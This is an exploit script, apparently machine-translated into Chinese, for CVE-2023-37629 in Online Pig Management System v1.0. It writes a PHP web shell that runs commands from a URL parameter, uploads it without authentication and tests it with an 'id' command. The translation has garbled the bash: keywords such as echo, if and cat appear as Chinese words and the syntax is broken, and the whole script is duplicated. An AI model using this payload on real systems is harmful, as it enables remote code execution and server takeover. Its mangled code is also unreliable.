#!/bin/bash
#利用title:在线猪场管理系统v1.0-未经身份验证的文件上传漏洞
#DATE: 2023年7月12日
#利用作者: 1337KID
#软件链接: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
#版本: 1.0
#在: Ubuntu上测试
#CVE : CVE-2023-37629
#
#chmod +x exploit.sh
#./exploit.sh web_url
#./exploit.sh http://127.0.0.1:8080/
回声'______ __ __ __ __ ______ ______ __ __ ____'
echo'/__ \\ \\///__ | _ | )\\ )/__ | /_//| ) \\'
回声'| (__ \\ v/| _ | _///()///////| _ \\ _ | _ \\/////_ \\//\/\ _, /', /'
回声'\\ _ | \\ /| _ | /_ \\ __/_ | _/| _ ///\ /\\ _/_____ |/__/'/'
回声' @ @1337Kid'
回声
如果[[$ 1==''']];然后
回声'没有指定的URL!”
出口
fi
base_url=$ 1
unauth_file_upload(){
#CVE-2023-37629-文件上传vuln
回声'生成shell.php'
#=============
猫壳。phpeof
?php系统(\ $ _ get ['cmd']);
eof
#=============
回声'完成'
curl -s -s -f [email protected] -f submit=pwned $ base_url/add -pig.php/dev/null
req=$(curl -s -s -i $ base_url'uploadfolder/shell.php?cmd=id=id'| head -1 | awk'{print $ 2}')
如果[[$ req=='200']];然后
回声'shell上传到$(echo $ base_url)uploadfolder/shell.php'
别的
回声'无法上传外壳'
fi
}
req=$(curl -i -s $ base_url | head -1 | awk'{print $ 2}')
如果[[$ req -eq'200']];然后
unauth_file_upload
别的
回声'错误'
回声'状态代码: $ req'
fi
#利用title:在线猪场管理系统v1.0-未经身份验证的文件上传漏洞
#DATE: 2023年7月12日
#利用作者: 1337KID
#软件链接: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
#版本: 1.0
#在: Ubuntu上测试
#CVE : CVE-2023-37629
#
#chmod +x exploit.sh
#./exploit.sh web_url
#./exploit.sh http://127.0.0.1:8080/
回声'______ __ __ __ __ ______ ______ __ __ ____'
echo'/__ \\ \\///__ | _ | )\\ )/__ | /_//| ) \\'
回声'| (__ \\ v/| _ | _///()///////| _ \\ _ | _ \\/////_ \\//\/\ _, /', /'
回声'\\ _ | \\ /| _ | /_ \\ __/_ | _/| _ ///\ /\\ _/_____ |/__/'/'
回声' @ @1337Kid'
回声
如果[[$ 1==''']];然后
回声'没有指定的URL!”
出口
fi
base_url=$ 1
unauth_file_upload(){
#CVE-2023-37629-文件上传vuln
回声'生成shell.php'
#=============
猫壳。phpeof
?php系统(\ $ _ get ['cmd']);
eof
#=============
回声'完成'
curl -s -s -f [email protected] -f submit=pwned $ base_url/add -pig.php/dev/null
req=$(curl -s -s -i $ base_url'uploadfolder/shell.php?cmd=id=id'| head -1 | awk'{print $ 2}')
如果[[$ req=='200']];然后
回声'shell上传到$(echo $ base_url)uploadfolder/shell.php'
别的
回声'无法上传外壳'
fi
}
req=$(curl -i -s $ base_url | head -1 | awk'{print $ 2}')
如果[[$ req -eq'200']];然后
unauth_file_upload
别的
回声'错误'
回声'状态代码: $ req'
fi